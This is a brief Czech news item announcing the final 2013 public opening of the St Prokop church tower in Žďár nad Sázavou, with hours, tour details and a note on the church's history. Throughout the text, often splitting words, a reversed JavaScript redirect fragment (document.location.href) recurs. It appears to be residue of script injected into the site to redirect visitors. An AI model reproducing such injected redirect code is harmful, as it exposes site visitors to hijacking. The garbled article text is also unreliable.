Žďár nad Sázavou, aktuality, kostel sv. Prokopa, věž
Rainbow page separator

Poslední prázdninový den bude věž zpřístupněna naposledy

Úterý, 20. srpna 2013

Žďár nad Sázavou / V sobotu 31. srpna bude veřejnosti v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce naposledy zpřístupněna věž žďárského farního kostela svatého Prokopa. Věž bude přístupná pro skupinky zájemců po patnácti osobách s průvodcem, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od 9 do 20 hodin. Prohlídka trvá přibližně dvacet minut a je zdarma. Zpřístupnění kostelní věže i ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát připravilo Regionální muzeum města Žďáru nad Sázavou ve spolupráci s Římskoka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolickou farností Žďár nad Sázavou I.

Na věži kostela svatého Prokopa zájemce kromě pohledu na Žďár nad Sázavou z ptačí perspektivy čeká i prohlídka his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torických fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografií města a panel se zajímavými materiály věnovanými jeho dějinám.

V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce byla čtyřiapadesát metrů vysoká hranolová věž s ochozem pro veřejnost otevřena už dvakrát – naposledy 6. července. Žďárský kostel svatého Prokopa byl postaven patrně už kolem roku 1270, v pozdně gotickém slohu byl přestaven v letech 1521 – 1560.